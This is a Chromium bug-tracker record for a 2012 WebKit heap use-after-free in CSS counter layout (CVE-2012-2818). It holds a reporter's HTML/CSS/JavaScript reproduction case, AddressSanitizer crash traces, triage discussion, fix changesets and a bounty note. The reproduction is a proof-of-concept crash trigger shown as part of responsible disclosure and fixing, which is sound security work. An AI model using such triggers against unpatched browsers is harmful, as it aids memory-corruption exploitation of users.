New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment

Use-after-free due to issues in counter layout.

Reported by miau...@gmail.com, Mar 29 2012

Issue description


VULNERABILITY DETAILS

use-after-free in WebCore::RenderObject::container

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1085.0 (Developer Build 129583)
OS	Linux
WebKit	536.5 (@112458)

Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        counter-reset: c;
      }
      #el0::before {
        content: counter(c);
        counter-reset: c;
        width: 1px;
        height: 1px;
        overflow-x: scroll;
        display: block;
      }
      #el0::after {
        counter-reset: c;
        display: table-header-group;
        content: counter(c);
      }
      #el2 {
        counter-reset: c;
      }
      #el3::before {
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        document.body.appendChild(el1)
        el2=document.createElement('div')
        el2.setAttribute('id','el2')
        el1.appendChild(el2)
        el3=document.createElement('div')
        el3.setAttribute('id','el3')
        document.body.appendChild(el3)
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==16346== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca75098 at pc 0x55555ac88045 bp 0x7fffffff9100 sp 0x7fffffff90f8
READ of size 8 at 0x7fffeca75098 thread T0
    #0 0x55555ac88045 in WebCore::RenderObject::container(WebCore::RenderBoxModelObject*, bool*) const ???:0
    #1 0x55555ac86e99 in WebCore::RenderObject::markContainingBlocksForLayout(bool, WebCore::RenderObject*) ???:0
    #2 0x55555a557d3a in WebCore::FrameView::scheduleRelayout() ???:0

0x7fffeca75098 is located 24 bytes inside of 184-byte region [0x7fffeca75080,0x7fffeca75138)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aca5bc2 in WebCore::RenderObjectChildList::updateBeforeAfterContent(WebCore::RenderObject*, WebCore::PseudoId, WebCore::RenderObject const*) ???:0
    #2 0x55555aa389ec in WebCore::RenderBlock::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) ???:0



 
24184.txt
9.6 KB View Download
24184.html
1.1 KB View Download
beta-24184.txt
9.4 KB View Download
stable-24184.txt
9.4 KB View Download
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Stability-AddressSanitizer SecSeverity-High
Status: Available

Comment 2 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 3 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18
Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.
Summary: Use-after-free due to issues in counter layout.
Cc: lafo...@chromium.org
Weird, dupes are not showing here. Anthony, any idea what is going wrong with the issue tracker wrt security bugs.

1. http://code.google.com/p/chromium/issues/detail?id=121291
2. http://code.google.com/p/chromium/issues/detail?id=121290
3. http://code.google.com/p/chromium/issues/detail?id=115912
4. http://code.google.com/p/chromium/issues/detail?id=120222

Comment 7 by miau...@gmail.com, Apr 1 2012

:(
Cc: miau...@gmail.com
 Issue 108958  has been merged into this issue.
@inferno: did we mean to merge the older bug into this newer one?
Cc: -lafo...@chromium.org
We just have to keep all these counter bugs in one master bug. Since all others were duped against this one, i did the same for 108958. We can fix the credits later.
Owner: kenrb@chromium.org
Superstar Ken is looking at this one.
Status: Started
Cc: rniwa@chromium.org
Cc: jchaffraix@chromium.org kenrb@chromium.org infe...@chromium.org
 Issue 121128  has been merged into this issue.
Cc: schenney@chromium.org
See http://code.google.com/p/chromium/issues/detail?id=120921 for a long discussion.

I think we are open to security issues with any text element (and maybe others) in a node that gets marked for layout during layout.
Status: Assigned
I can go back to looking at counters after, but I've separated 108958 back out from this and I'm trying to fix that one first.

If anyone is inclined to steal this in the meantime feel free.

Comment 18 by kenrb@chromium.org, Apr 12 2012

Status: Started

Comment 19 by kenrb@chromium.org, Apr 12 2012

Summary: Heap-use-after-free in WebCore::RenderObject::container
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7fcfe384a298
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95T-wkB8UtINNejsfb36-TkqpWA9aLh6OfZrsYtvO5B53ynHEVDQhTRdjiYfyjkl9VtdKL3xvZFpNW_93uTJJIS8Qb_oiFTxTJ86TD_V47On1w2Po7OphkoePURwGgHMqu8g7egQ3m8eEuHl_GjiVqYhx8veA
Summary: Use-after-free due to issues in counter layout.
Renaming the bug title since it conflicts with another bug.
 Issue 124550  has been merged into this issue.
 Issue 126404  has been merged into this issue.
Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.

Comment 25 by kenrb@chromium.org, May 18 2012

Status: Assigned

Comment 26 by kenrb@chromium.org, May 24 2012

These are the test cases that still repro at this point, aside from the first one that started this bug:
https://cluster-fuzz.appspot.com/testcase?key=30740098  (originally from  bug 120222 )

https://cluster-fuzz.appspot.com/testcase?key=43502492 (originally from  bug 126404 )

+ all the test cases from  bug 121128  but some of those repros are really hard to look at
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118452
Labels: -Mstone-19 Mstone-20 reward-topanel
Labels: -Merge-Approved
Status: Assigned
Reopening, needs a minor fix.
Labels: Merge-Approved
Status: FixUnreleased
Use this instead - http://trac.webkit.org/changeset/118542
Cc: dglazkov@chromium.org shinyak@chromium.org dominicc@chromium.org
 Issue 119087  has been merged into this issue.
Project Member

Comment 32 by ClusterFuzz, May 28 2012

ClusterFuzz has detected this issue as fixed in range 139082:139098.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff33660da98
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=139082:139098

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94FVj-ykvMa5QK5Gjo3n-OgSYnuNI3WBwius_ToiGfae7XTj-W93xH8UijqoAoU8zNmofoSb8bwWLCCUxm_Z8B5Kfa3JS-4aXQr1TFldPhHJJzDUAXvW2ZEl4p2BLJ0CJdOTnwRcfsflcnmbqkXnF7SDgBMcA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged
M20: http://trac.webkit.org/changeset/119621
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Labels: CVE-2012-2818
Labels: -reward-unpaid
Project Member

Comment 37 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member

Comment 39 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High -Mstone-20 Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High
Project Member

Comment 40 by bugdroid1@chromium.org, Mar 13 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 41 by bugdroid1@chromium.org, Mar 14 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 43 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 44 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 45 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 46 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 47 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 48 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 49 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 50 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment